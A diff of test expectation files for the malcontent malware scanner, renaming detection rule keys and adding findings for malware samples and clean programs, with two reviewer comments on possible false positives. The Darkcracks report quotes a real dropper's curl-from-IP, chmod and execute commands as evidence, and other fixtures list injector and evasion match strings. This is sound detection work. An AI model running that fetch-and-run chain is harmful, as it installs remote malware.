diff --git a/tests/javascript/clean/mode-php_laravel_blade.js.simple b/tests/javascript/clean/mode-php_laravel_blade.js.simple index 020791f13..e929ec3b9 100644 --- a/tests/javascript/clean/mode-php_laravel_blade.js.simple +++ b/tests/javascript/clean/mode-php_laravel_blade.js.simple @@ -15,7 +15,7 @@ discover/system/hostname_get: low discover/system/platform: low discover/user/USER: low discover/user/name_get: low -evasion/hidden_paths/hidden: medium +evasion/file/prefix: medium evasion/logging/acct: low exec/plugin: low exec/program: medium diff --git a/tests/javascript/clean/php.js.simple b/tests/javascript/clean/php.js.simple index 8a12e2499..18a7d482d 100644 --- a/tests/javascript/clean/php.js.simple +++ b/tests/javascript/clean/php.js.simple @@ -13,7 +13,7 @@ discover/system/hostname_get: low discover/system/platform: low discover/user/USER: low discover/user/name_get: low -evasion/hidden_paths/hidden: medium +evasion/file/prefix: medium evasion/logging/acct: low exec/plugin: low exec/program: medium diff --git a/tests/javascript/clean/securityDashboards.plugin.js.simple b/tests/javascript/clean/securityDashboards.plugin.js.simple index 726acf13c..171f88260 100644 --- a/tests/javascript/clean/securityDashboards.plugin.js.simple +++ b/tests/javascript/clean/securityDashboards.plugin.js.simple @@ -26,6 +26,7 @@ impact/remote_access/heartbeat: medium impact/remote_access/implant: medium impact/remote_access/trojan: medium lateral/scan/brute_force: low +lateral/scan/tool: medium net/download: medium net/http/form_upload: medium net/http/post: medium diff --git a/tests/javascript/clean/zxcvbn.js.simple b/tests/javascript/clean/zxcvbn.js.simple index 6d5f6c344..e44886620 100644 --- a/tests/javascript/clean/zxcvbn.js.simple +++ b/tests/javascript/clean/zxcvbn.js.simple 
@@ -21,6 +21,7 @@ impact/remote_access/heartbeat: medium impact/remote_access/implant: medium impact/remote_access/trojan: medium lateral/scan/brute_force: low +lateral/scan/tool: medium net/download: medium net/ip/multicast_send: low net/ip/spoof: medium diff --git a/tests/linux/2021.FontOnLake/45E9.elf.simple b/tests/linux/2021.FontOnLake/45E9.elf.simple index 852001aa1..c66a9ab9b 100644 --- a/tests/linux/2021.FontOnLake/45E9.elf.simple +++ b/tests/linux/2021.FontOnLake/45E9.elf.simple @@ -16,12 +16,13 @@ discover/user/HOME: low discover/user/USER: low evasion/bypass_security/linux/pam: medium evasion/bypass_security/linux/se: medium -evasion/hidden_paths/hidden: medium -evasion/hidden_paths/proc: high -evasion/hidden_paths/x11: low +evasion/file/location/tmp_x11_unix: low +evasion/file/prefix: medium +evasion/file/prefix/proc: high evasion/logging/acct: low evasion/logging/failed_logins: medium evasion/logging/historical_logins: medium +evasion/rootkit/refs: high exec/program: medium exec/program/background: low exec/shell/SHELL: low @@ -61,8 +62,8 @@ impact/remote_access/backdoor: high impact/remote_access/reverse_shell: medium impact/remote_access/ssh: high impact/rootkit: critical -impact/rootkit/refs: high impact/ui/x11_auth: medium +lateral/scan/tool: medium malware/family/fontonlake: critical net/download: medium net/ip/spoof: medium diff --git a/tests/linux/2021.XMR-Stak/1b1a56.elf.simple b/tests/linux/2021.XMR-Stak/1b1a56.elf.simple index 65d91e761..7602a71ba 100644 --- a/tests/linux/2021.XMR-Stak/1b1a56.elf.simple +++ b/tests/linux/2021.XMR-Stak/1b1a56.elf.simple @@ -19,7 +19,7 @@ discover/system/cpu_info: low discover/system/platform: low discover/system/sysinfo: medium discover/user/HOME: low -evasion/hidden_paths/var_run: medium +evasion/file/location/var_run: medium exec/conditional/LANG: low exec/dylib/address_check: low exec/dylib/iterate: low 
@@ -86,4 +86,4 @@ privesc/sudo: medium process/create: low process/multithreaded: low process/name_set: medium -process/thread_local_storage: low +process/thread_local_storage: medium diff --git a/tests/linux/2022.Symbiote/kerneldev.so.bkp.simple b/tests/linux/2022.Symbiote/kerneldev.so.bkp.simple index 831775516..4448d98a5 100644 --- a/tests/linux/2022.Symbiote/kerneldev.so.bkp.simple +++ b/tests/linux/2022.Symbiote/kerneldev.so.bkp.simple @@ -6,7 +6,7 @@ credential/keylogger: medium credential/password: low discover/network/interface_list: medium discover/system/platform: low -evasion/hijack_execution/process_hide: critical +evasion/rootkit/linux_userspace: critical exec/dylib/symbol_address: medium exfil/stealer/pam: high fs/link_read: low diff --git a/tests/linux/2022.bpfdoor/bpfdoor_2.simple b/tests/linux/2022.bpfdoor/bpfdoor_2.simple index 9ca216b9d..80d372626 100644 --- a/tests/linux/2022.bpfdoor/bpfdoor_2.simple +++ b/tests/linux/2022.bpfdoor/bpfdoor_2.simple @@ -1,7 +1,7 @@ # linux/2022.bpfdoor/bpfdoor_2: critical 3P/elastic/bpfdoor: critical credential/sniffer/pcap: high -evasion/hidden_paths/x11: low +evasion/file/location/tmp_x11_unix: low evasion/logging/hide_shell_history: high exec/program: medium exec/program/background: low diff --git a/tests/linux/2022.ez-pwnkit/payload.simple b/tests/linux/2022.ez-pwnkit/payload.simple index 944a8619e..5f6a0a3e8 100644 --- a/tests/linux/2022.ez-pwnkit/payload.simple +++ b/tests/linux/2022.ez-pwnkit/payload.simple @@ -20,6 +20,7 @@ impact/exploit/GCONV_PATH: high impact/exploit/cve: high impact/exploit/pwnkit: critical impact/remote_access/reverse_shell: medium +lateral/scan/tool: medium net/dns: low net/dns/servers: low net/dns/txt: low diff --git a/tests/linux/2023.FreeDownloadManager/freedownloadmanager.sdiff b/tests/linux/2023.FreeDownloadManager/freedownloadmanager.sdiff index 50848ad7d..6f4d79d1c 100644 --- a/tests/linux/2023.FreeDownloadManager/freedownloadmanager.sdiff 
+++ b/tests/linux/2023.FreeDownloadManager/freedownloadmanager.sdiff @@ -15,7 +15,7 @@ +data/embedded/base64_url +data/embedded/pgp_key +data/encoding/base64 -+evasion/hidden_paths/var_tmp ++evasion/file/location/var_tmp +exec/install_additional/add_apt_key +exec/shell/exec +exec/shell/ignore_output diff --git a/tests/linux/2023.Kinsing/install.sh.simple b/tests/linux/2023.Kinsing/install.sh.simple index ed250bc6d..7e125dabc 100644 --- a/tests/linux/2023.Kinsing/install.sh.simple +++ b/tests/linux/2023.Kinsing/install.sh.simple @@ -19,10 +19,10 @@ evasion/bypass_security/linux/iptables: medium evasion/bypass_security/linux/se: medium evasion/bypass_security/linux/se_disable: high evasion/bypass_security/linux/ufw: medium -evasion/covert_location/dev_shm: critical -evasion/hidden_paths/dev_shm: critical -evasion/hidden_paths/hidden: high -evasion/hidden_paths/var_tmp: medium +evasion/file/location/dev_shm: critical +evasion/file/location/var_tmp: medium +evasion/file/prefix: high +evasion/file/prefix/dev: critical evasion/hijack_execution/etc_ld.so.preload: high evasion/logging/syslog: medium evasion/mimicry/fake_process: critical @@ -56,10 +56,9 @@ impact/cryptojacking/cryptonight: high impact/cryptojacking/generic: high impact/cryptojacking/monero_pool: medium impact/cryptojacking/xmrig: high +impact/degrade/firewall: high impact/degrade/infection: critical impact/degrade/linux_paths: high -impact/degrade/selinux_firewall: high -impact/degrade/ufw: high impact/remote_access/agent: medium impact/remote_access/iptables: medium impact/remote_access/kill_rm: medium diff --git a/tests/linux/2024.Darkcracks/darkcracks.sh.md b/tests/linux/2024.Darkcracks/darkcracks.sh.md index 495e7d436..068854e57 100644 --- a/tests/linux/2024.Darkcracks/darkcracks.sh.md +++ b/tests/linux/2024.Darkcracks/darkcracks.sh.md 
@@ -3,7 +3,7 @@ | RISK | KEY | DESCRIPTION | EVIDENCE | |----------|---------------------------------------------------------------------------------------------------------------------------------------------------------------------|----------------------------------------------------------------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| | CRITICAL | [c2/tool_transfer/shell](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/shell.yara#curl_chmod_relative_run_tiny) | change dir, fetch file, make it executable, and run it | [./agr](https://github.com/search?q=.%2Fagr&type=code)
[./wdvsh agr](https://github.com/search?q=.%2Fwdvsh+agr&type=code)
[cd /mnt](https://github.com/search?q=cd+%2Fmnt&type=code)
[cd /root](https://github.com/search?q=cd+%2Froot&type=code)
[cd /tmp](https://github.com/search?q=cd+%2Ftmp&type=code)
[cd /var/run](https://github.com/search?q=cd+%2Fvar%2Frun&type=code)
[chmod +x ./wdvsh](https://github.com/search?q=chmod+%2Bx+.%2Fwdvsh&type=code)
[curl http://179.191.68.85:82/vendor/sebastian/diff/src/Exception/j8UgL3v -o agr](https://github.com/search?q=curl+http%3A%2F%2F179.191.68.85%3A82%2Fvendor%2Fsebastian%2Fdiff%2Fsrc%2FException%2Fj8UgL3v+-o+agr&type=code) | -| CRITICAL | [evasion/covert_location/chdir_unusual](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/covert-location/chdir-unusual.yara#cd_val_obsessive) | changes directory to multiple unusual locations | [cd /;](https://github.com/search?q=cd+%2F%3B&type=code)
[cd /mnt](https://github.com/search?q=cd+%2Fmnt&type=code)
[cd /root](https://github.com/search?q=cd+%2Froot&type=code)
[cd /tmp](https://github.com/search?q=cd+%2Ftmp&type=code) | +| CRITICAL | [evasion/file/location/chdir_unusual](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/file/location/chdir-unusual.yara#cd_val_obsessive) | changes directory to multiple unusual locations | [cd /;](https://github.com/search?q=cd+%2F%3B&type=code)
[cd /mnt](https://github.com/search?q=cd+%2Fmnt&type=code)
[cd /root](https://github.com/search?q=cd+%2Froot&type=code)
[cd /tmp](https://github.com/search?q=cd+%2Ftmp&type=code) | | CRITICAL | [evasion/self_deletion/run_sleep_delete](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/self_deletion/run_sleep_delete.yara#run_sleep_delete) | run executable, sleep, and delete | [./wdvsh agr](https://github.com/search?q=.%2Fwdvsh+agr&type=code)
[chmod +x ./wdvsh](https://github.com/search?q=chmod+%2Bx+.%2Fwdvsh&type=code)
[rm ./agr](https://github.com/search?q=rm+.%2Fagr&type=code)
[rm ./wdvsh](https://github.com/search?q=rm+.%2Fwdvsh&type=code)
[sleep 3](https://github.com/search?q=sleep+3&type=code) | | CRITICAL | [net/download/fetch](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/download/fetch.yara#curl_download_ip) | Invokes curl to download a file from an IP | [curl http://179.191.68.85:82/vendor/sebastian/diff/src/Exception/j8UgL3v -o](https://github.com/search?q=curl+http%3A%2F%2F179.191.68.85%3A82%2Fvendor%2Fsebastian%2Fdiff%2Fsrc%2FException%2Fj8UgL3v+-o&type=code) | | HIGH | [c2/addr/ip](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/ip.yara#http_hardcoded_ip) | hardcoded IP address within a URL | [http://179.191.68.85:82/vendor/sebastian/diff/src/Exception/j8UgL3v](http://179.191.68.85:82/vendor/sebastian/diff/src/Exception/j8UgL3v)
[http://179.191.68.85:82/vendor/sebastian/diff/src/Exception/pQ1iM9hd-x64-musl](http://179.191.68.85:82/vendor/sebastian/diff/src/Exception/pQ1iM9hd-x64-musl) | diff --git a/tests/linux/2024.Kaiji/eight-nebraska-autumn-illinois.simple b/tests/linux/2024.Kaiji/eight-nebraska-autumn-illinois.simple index c9be21eeb..e86abfca0 100644 --- a/tests/linux/2024.Kaiji/eight-nebraska-autumn-illinois.simple +++ b/tests/linux/2024.Kaiji/eight-nebraska-autumn-illinois.simple @@ -21,7 +21,7 @@ discover/system/hostname_get: low discover/system/platform: low evasion/bypass_security/linux/se: medium evasion/bypass_security/linux/se_disable: high -evasion/hidden_paths/hidden: medium +evasion/file/prefix: medium exec/plugin: low exec/program: medium exec/shell/exec: medium @@ -53,6 +53,7 @@ impact/exploit/cve_list: medium impact/remote_access/kill_rm: medium impact/remote_access/reverse_shell: high impact/remote_access/systemctl: critical +lateral/scan/tool: medium lateral/ssh/attack: high malware/family/kaiji: critical net/dns: low diff --git a/tests/linux/2024.Mirai/ppc.simple b/tests/linux/2024.Mirai/ppc.simple index 63989f0ad..fdf8eff46 100644 --- a/tests/linux/2024.Mirai/ppc.simple +++ b/tests/linux/2024.Mirai/ppc.simple @@ -5,6 +5,7 @@ fs/proc/cpuinfo: medium fs/proc/stat: medium hw/cpu: medium impact/remote_access/router: high +lateral/scan/tool: medium malware/family/mirai: critical net/ip/parse: medium net/socket/local_addr: low diff --git a/tests/linux/2024.TellYouThePass/uranus-ack-mike-cat.simple b/tests/linux/2024.TellYouThePass/uranus-ack-mike-cat.simple index 0489009db..adfdcbd45 100644 --- a/tests/linux/2024.TellYouThePass/uranus-ack-mike-cat.simple +++ b/tests/linux/2024.TellYouThePass/uranus-ack-mike-cat.simple @@ -19,7 +19,7 @@ discover/system/hostname_get: low discover/system/platform: low discover/user/HOME: low discover/user/USER: low -evasion/hidden_paths/hidden: medium +evasion/file/prefix: medium exec/cmd: medium exec/plugin: low exec/program: medium 
@@ -46,6 +46,7 @@ fs/permission/chown: medium
 fs/permission/modify: medium
 impact/ransom/note: high
 impact/remote_access/reverse_shell: medium
+lateral/scan/tool: medium
 net/dns: low
 net/dns/servers: low
 net/dns/txt: low
diff --git a/tests/linux/2024.chisel/crondx.simple b/tests/linux/2024.chisel/crondx.simple
index 3c58b6b40..ce62875f6 100644
--- a/tests/linux/2024.chisel/crondx.simple
+++ b/tests/linux/2024.chisel/crondx.simple
@@ -27,6 +27,7 @@ fs/path/etc_hosts: medium
 fs/path/etc_resolv.conf: low
 fs/permission/chown: medium
 fs/permission/modify: medium
+lateral/scan/tool: medium
 net/dns: low
 net/dns/servers: low
 net/dns/txt: low
diff --git a/tests/linux/2024.clobber_xmrig/cba8d79949adc3c56c02fee56644f4084b7471bc5aed1c81803054f017240a72.simple b/tests/linux/2024.clobber_xmrig/cba8d79949adc3c56c02fee56644f4084b7471bc5aed1c81803054f017240a72.simple
index 456a2d854..f0e9223d4 100644
--- a/tests/linux/2024.clobber_xmrig/cba8d79949adc3c56c02fee56644f4084b7471bc5aed1c81803054f017240a72.simple
+++ b/tests/linux/2024.clobber_xmrig/cba8d79949adc3c56c02fee56644f4084b7471bc5aed1c81803054f017240a72.simple
@@ -25,7 +25,7 @@ discover/system/cpu_info: low
 discover/system/hostname_get: low
 discover/user/HOME: low
 evasion/bypass_security/linux/pam: medium
-evasion/hidden_paths/hidden: medium
+evasion/file/prefix: medium
 evasion/logging/acct: low
 exec/plugin: low
 exec/system_controls/systemd: medium
@@ -44,6 +44,7 @@ fs/permission/chown: medium
 fs/permission/modify: medium
 impact/cryptojacking/nicehash_pool: high
 impact/cryptojacking/xmrig: high
+lateral/scan/tool: medium
 net/dns: low
 net/dns/reverse: medium
 net/dns/servers: low
diff --git a/tests/linux/2024.gas/gas.simple b/tests/linux/2024.gas/gas.simple
index 2765835ac..85fcb740d 100644
--- a/tests/linux/2024.gas/gas.simple
+++ b/tests/linux/2024.gas/gas.simple
@@ -28,6 +28,7 @@ hw/cpu: medium
 impact/exploit/GCONV_PATH: low
 impact/remote_access/dl_iterate: high
 impact/remote_access/reverse_shell: medium
+lateral/scan/tool: medium
 net/socket/send: low
 net/url/embedded: low
 process/create: low
diff --git a/tests/linux/2024.hadooken/crondr_as_bash.sh.simple b/tests/linux/2024.hadooken/crondr_as_bash.sh.simple
index 7010cb07e..e5453d82d 100644
--- a/tests/linux/2024.hadooken/crondr_as_bash.sh.simple
+++ b/tests/linux/2024.hadooken/crondr_as_bash.sh.simple
@@ -1,5 +1,5 @@
 # linux/2024.hadooken/crondr_as_bash.sh: critical
-evasion/covert_location/chdir_unusual: high
+evasion/file/location/chdir_unusual: high
 evasion/mimicry/fake_process: high
 evasion/self_deletion/copy_run_delete: critical
 exec/shell/exec: medium
diff --git a/tests/linux/2024.hadooken/ssh_worm.sh.simple b/tests/linux/2024.hadooken/ssh_worm.sh.simple
index d918a8b0e..84202d84b 100644
--- a/tests/linux/2024.hadooken/ssh_worm.sh.simple
+++ b/tests/linux/2024.hadooken/ssh_worm.sh.simple
@@ -9,7 +9,7 @@ credential/ssh: high
 data/base64/external: medium
 data/embedded/base64_url: medium
 data/encoding/base64: low
-evasion/hidden_paths/hidden: medium
+evasion/file/prefix: medium
 exec/shell/pipe_sh: medium
 exec/shell/tmp_semicolon: high
 exfil/stealer/linux_server: high
diff --git a/tests/linux/2024.k4spreader/degrader.sh.simple b/tests/linux/2024.k4spreader/degrader.sh.simple
index 5d6c337f8..5da701263 100644
--- a/tests/linux/2024.k4spreader/degrader.sh.simple
+++ b/tests/linux/2024.k4spreader/degrader.sh.simple
@@ -4,5 +4,4 @@ evasion/bypass_security/linux/ufw: medium
 evasion/hijack_execution/etc_ld.so.preload: high
 fs/attributes/chattr: medium
 fs/path/etc: low
-impact/degrade/iptables: high
-impact/degrade/ufw: high
+impact/degrade/firewall: high
diff --git a/tests/linux/2024.k4spreader/knlib.simple b/tests/linux/2024.k4spreader/knlib.simple
index 435f19650..fd69bf578 100644
--- a/tests/linux/2024.k4spreader/knlib.simple
+++ b/tests/linux/2024.k4spreader/knlib.simple
@@ -1,5 +1,5 @@
 # linux/2024.k4spreader/knlib: critical
-evasion/covert_location/chdir_unusual: high
+evasion/file/location/chdir_unusual: high
 evasion/self_deletion/copy_run_delete: critical
 exec/shell/exec: medium
 exec/shell/ignore_output: medium
diff --git a/tests/linux/2024.kubo_injector/injector.json b/tests/linux/2024.kubo_injector/injector.json
index 462a28c6a..457ebb356 100644
--- a/tests/linux/2024.kubo_injector/injector.json
+++ b/tests/linux/2024.kubo_injector/injector.json
@@ -15,26 +15,30 @@
 {
 "Description": "may inject code into other processes",
 "MatchStrings": [
- "/proc/%d/maps",
- "process",
- "ptrace"
+ "/proc",
+ "maps",
+ "successfully injected",
+ "to inject",
+ "to-inject"
 ],
 "RiskScore": 3,
 "RiskLevel": "HIGH",
- "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/process_injection/process-inject.yara#ptrace_injector",
+ "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/process_injection/process-inject.yara#library_injector",
 "ID": "evasion/process_injection/process_inject",
- "RuleName": "ptrace_injector"
+ "RuleName": "library_injector"
 },
 {
- "Description": "trace or modify system calls",
+ "Description": "may inject code into other processes",
 "MatchStrings": [
+ "/proc/%d/maps",
+ "process",
 "ptrace"
 ],
- "RiskScore": 2,
- "RiskLevel": "MEDIUM",
- "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/process_injection/ptrace.yara#ptrace",
+ "RiskScore": 3,
+ "RiskLevel": "HIGH",
+ "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/process_injection/ptrace.yara#ptrace_injector",
 "ID": "evasion/process_injection/ptrace",
- "RuleName": "ptrace"
+ "RuleName": "ptrace_injector"
 },
 {
 "Description": "get the address of a symbol",
diff --git a/tests/linux/2024.kworker_pretenders/emp3r0r.agent.simple b/tests/linux/2024.kworker_pretenders/emp3r0r.agent.simple
index cee09e8ae..580ffc3ed 100644
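Review bot: The rewritten `library_injector` expectation in the first MatchStrings block now matches on the bare strings `/proc` and `maps`, where the previous `ptrace_injector` entry required the far more specific `/proc/%d/maps`. Unless the rule's condition requires these together with `to inject`/`successfully injected`, any program that reads `/proc/<pid>/maps` for ordinary reasons will carry a HIGH process-injection finding; the rule in rules/evasion/process_injection/process-inject.yara is outside this hunk, so only its effect is visible here. Consider stating in the rule's meta which strings must co-occur, and adding a clean fixture that reads `/proc/self/maps` without injecting so the boundary is pinned by a test rather than by this expectation file.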
--- a/tests/linux/2024.kworker_pretenders/emp3r0r.agent.simple
+++ b/tests/linux/2024.kworker_pretenders/emp3r0r.agent.simple
@@ -41,10 +41,10 @@ discover/system/sysinfo: medium
 discover/user/HOME: low
 discover/user/USER: low
 discover/user/name_get: medium
-evasion/covert_location/chdir_unusual: medium
-evasion/covert_location/dev_shm: medium
-evasion/hidden_paths/dev_shm: critical
-evasion/hidden_paths/hidden: high
+evasion/file/location/chdir_unusual: medium
+evasion/file/location/dev_shm: medium
+evasion/file/prefix: high
+evasion/file/prefix/dev: critical
 evasion/hijack_execution/LD_LIBRARY_PATH: low
 evasion/logging/current_logins: medium
 evasion/logging/hide_shell_history: high
@@ -104,6 +104,7 @@ impact/remote_access/kill_rm: medium
 impact/remote_access/net_exec: medium
 impact/remote_access/pseudo_terminal: medium
 impact/remote_access/reverse_shell: high
+lateral/scan/tool: medium
 malware/family/emp3r0r: critical
 net/dns: low
 net/dns/over_https: medium
diff --git a/tests/linux/2024.kworker_pretenders/gafgyt.simple b/tests/linux/2024.kworker_pretenders/gafgyt.simple
index d05ad257d..5abb9cf5a 100644
--- a/tests/linux/2024.kworker_pretenders/gafgyt.simple
+++ b/tests/linux/2024.kworker_pretenders/gafgyt.simple
@@ -5,9 +5,9 @@ anti-static/packer/elf: high
 credential/ssh/d: medium
 data/base64/external: medium
 data/encoding/base64: low
-evasion/covert_location/dev_shm: medium
-evasion/hidden_paths/var_run: medium
-evasion/hidden_paths/var_tmp: medium
+evasion/file/location/dev_shm: medium
+evasion/file/location/var_run: medium
+evasion/file/location/var_tmp: medium
 evasion/mimicry/fake_process: critical
 exec/shell/echo: medium
 exec/shell/exec: medium
@@ -23,6 +23,7 @@ fs/path/usr_sbin: low
 fs/path/var: low
 fs/proc/arbitrary_pid: medium
 fs/proc/self_exe: medium
+lateral/scan/tool: medium
 net/dns/servers: low
 net/http/request: low
 net/socket/send: low
diff --git a/tests/linux/2024.medusa/rkload.simple b/tests/linux/2024.medusa/rkload.simple
index 79a6bc7ad..fce1bdc25 100644
--- a/tests/linux/2024.medusa/rkload.simple
+++ b/tests/linux/2024.medusa/rkload.simple
@@ -6,18 +6,22 @@ anti-static/xor/commands: high
 credential/ssh/d: medium
 discover/system/cpu_info: low
 discover/system/sysinfo: medium
-evasion/covert_location/dev_shm: high
-evasion/hidden_paths/dev_shm: critical
-evasion/hidden_paths/hidden: high
-evasion/hide_artifacts/system_directories: medium
+evasion/file/location/dev_shm: high
+evasion/file/location/lib: high
+evasion/file/location/system_directories: medium
+evasion/file/prefix: high
+evasion/file/prefix/dev: critical
+evasion/file/prefix/lib: high
 evasion/hijack_execution/LD_LIBRARY_PATH: low
 evasion/hijack_execution/etc_ld.so.preload: medium
+evasion/rootkit/linux_userspace: critical
 exec/conditional/LANG: low
 exec/dylib/address_check: low
 exec/dylib/symbol_address: medium
 exec/program: medium
 exec/program/background: low
 exec/shell/exec: medium
+exfil/stealer/ssh: high
 fs/attributes/set: medium
 fs/directory/create: low
 fs/file/copy: medium
@@ -37,7 +41,7 @@ fs/tempdir/TMPDIR: low
 hw/cpu: medium
 impact/exploit/GCONV_PATH: low
 impact/remote_access/reverse_shell: medium
-impact/rootkit/readdir_interceptor: high
+lateral/scan/tool: medium
 malware/family/medusa: critical
 net/socket/local_addr: low
 net/socket/send: low
diff --git a/tests/linux/2024.miner_dropper/drop.sh.simple b/tests/linux/2024.miner_dropper/drop.sh.simple
index ed3045bb0..8f15244cb 100644
--- a/tests/linux/2024.miner_dropper/drop.sh.simple
+++ b/tests/linux/2024.miner_dropper/drop.sh.simple
@@ -1,7 +1,7 @@
 # linux/2024.miner_dropper/drop.sh: critical
 c2/addr/ip: high
 c2/tool_transfer/shell: critical
-evasion/covert_location/chdir_unusual: critical
+evasion/file/location/chdir_unusual: critical
 exec/shell/busybox_exec: high
 exec/shell/exec: medium
 exec/shell/relative_semicolon: high
diff --git a/tests/linux/2024.sbcl.market/sbcl.sdiff b/tests/linux/2024.sbcl.market/sbcl.sdiff index f2962b838..08e466ca4 100644 --- a/tests/linux/2024.sbcl.market/sbcl.sdiff +++ b/tests/linux/2024.sbcl.market/sbcl.sdiff @@ -2,7 +2,7 @@ -data/compression/zstd -discover/user/HOME -discover/user/USER --evasion/hidden_paths/var_tmp +-evasion/file/location/var_tmp -exec/dylib/address_check -exec/dylib/symbol_address -exec/program @@ -19,12 +19,13 @@ -fs/symlink_resolve -net/url/embedded ++++ added: sbcl.dirty ++anti-static/elf/entropy +anti-static/packer/high_entropy +data/compression/zstd +data/embedded/zstd +discover/user/HOME +discover/user/USER -+evasion/hidden_paths/var_tmp ++evasion/file/location/var_tmp +exec/dylib/address_check +exec/dylib/symbol_address +exec/program diff --git a/tests/linux/2024.sliver/de33b8d9694b6b4c44e3459b2151571af5d0e2031551f9f1a70b6db475ba71b2.elf.simple b/tests/linux/2024.sliver/de33b8d9694b6b4c44e3459b2151571af5d0e2031551f9f1a70b6db475ba71b2.elf.simple index 43567cf92..2b97f9fd3 100644 --- a/tests/linux/2024.sliver/de33b8d9694b6b4c44e3459b2151571af5d0e2031551f9f1a70b6db475ba71b2.elf.simple +++ b/tests/linux/2024.sliver/de33b8d9694b6b4c44e3459b2151571af5d0e2031551f9f1a70b6db475ba71b2.elf.simple @@ -1,4 +1,5 @@ # linux/2024.sliver/de33b8d9694b6b4c44e3459b2151571af5d0e2031551f9f1a70b6db475ba71b2.elf: critical +anti-static/elf/entropy: high anti-static/packer/elf: high anti-static/packer/high_entropy: medium anti-static/packer/upx: high diff --git a/tests/linux/UPX/06ed158.md b/tests/linux/UPX/06ed158.md index d9e616d5f..54b37428f 100644 --- a/tests/linux/UPX/06ed158.md +++ b/tests/linux/UPX/06ed158.md 
@@ -2,6 +2,7 @@ | RISK | KEY | DESCRIPTION | EVIDENCE | |--------|-------------------------------------------------------------------------------------------------------------------------------------------------------|-----------------------------------------|------------------------------------------------------| +| HIGH | [anti-static/elf/entropy](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/elf/entropy.yara#normal_elf_high_entropy_7_2) | high entropy ELF binary (>7.2) | | | HIGH | [anti-static/packer/elf](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/packer/elf.yara#obfuscated_elf) | Obfuscated ELF binary (missing symbols) | | | HIGH | [anti-static/packer/high_entropy](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/packer/high_entropy.yara#high_entropy_7_9) | high entropy binary (>7.9) | | | HIGH | [anti-static/packer/upx](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/packer/upx.yara#upx) | Binary is packed with UPX | [UPX!](https://github.com/search?q=UPX%21&type=code) | diff --git a/tests/linux/clean/appsec-rules.json.simple b/tests/linux/clean/appsec-rules.json.simple index 21880ef60..0de75e3f4 100644 --- a/tests/linux/clean/appsec-rules.json.simple +++ b/tests/linux/clean/appsec-rules.json.simple @@ -24,7 +24,7 @@ discover/system/platform: low discover/user/name_get: medium evasion/bypass_security/linux/iptables: medium evasion/bypass_security/linux/ufw: medium -evasion/hidden_paths/hidden: medium +evasion/file/prefix: medium evasion/logging/acct: low evasion/process_injection/readelf: medium exec/plugin: low @@ -52,6 +52,7 @@ hw/wireless: low impact/exploit: medium impact/exploit/cve: medium impact/remote_access/iptables: medium +lateral/scan/tool: medium net/dns/servers: low net/download: medium net/http/cookies: medium diff --git a/tests/linux/clean/caddy.simple b/tests/linux/clean/caddy.simple index 5ee09852f..b144dd59e 100644 
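Review bot: The new `lateral/scan/tool: medium` finding lands in a clean fixture here (`tests/linux/clean/appsec-rules.json.simple`, hunk `@@ -52,6 +52,7 @@`) and again in `tests/linux/clean/code-oss.md` further down, where the recorded evidence is only generic vocabulary (`port`, `scan`, `socket`, `connect`, `target`, `probe`, `banner`). Accepting these expectation updates bakes the false positives into the clean corpus rather than tightening `generic_scan_tool`; before merge the rule should require a less common anchor or a higher hit count so that an IDE- or browser-sized string table does not trip it. The rule file `rules/lateral/scan/scan_tool.yara` is outside this hunk, so its current condition cannot be checked from here.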
--- a/tests/linux/clean/caddy.simple
+++ b/tests/linux/clean/caddy.simple
@@ -44,8 +44,8 @@ discover/system/platform: medium
 discover/user/HOME: low
 discover/user/USER: low
 discover/user/name_get: low
-evasion/hidden_paths/hidden: medium
-evasion/hidden_paths/var_run: medium
+evasion/file/location/var_run: medium
+evasion/file/prefix: medium
 exec/cmd: medium
 exec/conditional/LANG: low
 exec/install_additional/package_install: medium
diff --git a/tests/linux/clean/chezmoi.simple b/tests/linux/clean/chezmoi.simple
index c2698a743..8d70e7c8a 100644
--- a/tests/linux/clean/chezmoi.simple
+++ b/tests/linux/clean/chezmoi.simple
@@ -53,7 +53,7 @@ discover/system/sysinfo: medium
 discover/user/HOME: low
 discover/user/USER: low
 discover/user/name_get: medium
-evasion/hidden_paths/hidden: medium
+evasion/file/prefix: medium
 exec/cmd: medium
 exec/conditional/LANG: low
 exec/plugin: low
diff --git a/tests/linux/clean/chrome.simple b/tests/linux/clean/chrome.simple
index ef7e5ac8b..202202cb5 100644
--- a/tests/linux/clean/chrome.simple
+++ b/tests/linux/clean/chrome.simple
@@ -45,7 +45,7 @@ discover/system/sysinfo: medium
 discover/user/HOME: low
 discover/user/USER: low
 evasion/bypass_security/linux/ufw: medium
-evasion/covert_location/dev_shm: medium
+evasion/file/location/dev_shm: medium
 evasion/hijack_execution/LD_LIBRARY_PATH: low
 evasion/process_injection/ptrace: medium
 exec/cmd: medium
@@ -164,7 +164,7 @@ process/groups_set: low
 process/multithreaded: low
 process/name_get: medium
 process/parent_pid_get: low
-process/thread_local_storage: low
+process/thread_local_storage: medium
 process/userid_set: low
 sus/exclamation: medium
 sus/intercept: medium
diff --git a/tests/linux/clean/clickhouse.simple b/tests/linux/clean/clickhouse.simple
index 9dc863651..dc8a4d60e 100644
--- a/tests/linux/clean/clickhouse.simple
+++ b/tests/linux/clean/clickhouse.simple
